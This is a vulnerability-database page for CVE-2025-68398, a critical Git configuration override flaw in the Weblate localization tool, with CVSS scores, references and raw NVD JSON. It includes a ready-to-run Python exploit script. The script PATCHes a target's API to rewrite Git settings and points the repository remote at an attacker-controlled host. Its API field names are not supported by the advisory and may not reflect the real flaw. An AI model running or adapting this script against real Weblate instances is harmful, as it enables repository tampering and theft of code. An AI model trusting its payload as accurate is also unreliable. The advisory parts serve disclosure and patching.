CVE-2025-68398

Description

Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:* - VULNERABLE

Weblate < 5.15.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-68398 PoC - Weblate Git Configuration Override # This PoC demonstrates the Git config injection vulnerability # Note: Requires high-privilege Weblate account import requests import json TARGET_URL = "https://vulnerable-weblate-instance.com" API_TOKEN = "your_weblate_api_token" PROJECT_SLUG = "your_project" COMPONENT_SLUG = "your_component" def override_git_config(): """ Exploit to override Git configuration remotely via Weblate API """ headers = { "Authorization": f"Token {API_TOKEN}", "Content-Type": "application/json" } # Malicious Git configuration payload payload = { "component_settings": { "git_export": { "config": { "user.name": "Attacker", "user.email": "[email protected]", "commit.gpgsign": "false", "remote.origin.url": "https://attacker-controlled-repo.com/malicious.git" } } } } url = f"{TARGET_URL}/api/components/{PROJECT_SLUG}/{COMPONENT_SLUG}/" response = requests.patch(url, headers=headers, json=payload) if response.status_code == 200: print("[+] Git configuration overridden successfully") print("[+] Attacker can now manipulate Git behavior") return True else: print(f"[-] Failed: {response.status_code}") return False def verify_exploitation(): """ Verify if Git config was successfully modified """ headers = { "Authorization": f"Token {API_TOKEN}" } url = f"{TARGET_URL}/api/components/{PROJECT_SLUG}/{COMPONENT_SLUG}/repository/" response = requests.get(url, headers=headers) if response.status_code == 200: repo_info = response.json() print(f"[+] Repository status: {repo_info}") return True return False if __name__ == "__main__": print("[*] CVE-2025-68398 Exploitation Script") print("[*] Target: Weblate < 5.15.1") if override_git_config(): verify_exploitation() print("[*] Patch: Upgrade to Weblate 5.15.1 or later")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68398
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68398
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68398/
[4] VulDB https://vuldb.com/cve/CVE-2025-68398
[5] https://github.com/WeblateOrg/weblate/commit/4837a4154390f7c1d03c0e398aa6439dcfa361b4
[6] https://github.com/WeblateOrg/weblate/commit/dd8c9d7b00eebe28770fa0e2cd96126791765ea7
[7] https://github.com/WeblateOrg/weblate/pull/17330
[8] https://github.com/WeblateOrg/weblate/pull/17345
[9] https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1
[10] https://github.com/WeblateOrg/weblate/security/advisories/GHSA-8vcg-cfxj-p5m3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68398", "sourceIdentifier": "[email protected]", "published": "2025-12-18T23:15:49.720", "lastModified": "2026-02-06T20:16:08.620", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.15.1", "matchCriteriaId": "D694E7D3-F4E0-44F5-B2EE-9B6EDDA4607F"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/weblate/commit/4837a4154390f7c1d03c0e398aa6439dcfa361b4", "source": "[email protected]"}, {"url": "https://github.com/WeblateOrg/weblate/commit/dd8c9d7b00eebe28770fa0e2cd96126791765ea7", "source": "[email protected]"}, {"url": "https://github.com/WeblateOrg/weblate/pull/17330", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/pull/17345", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-8vcg-cfxj-p5m3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}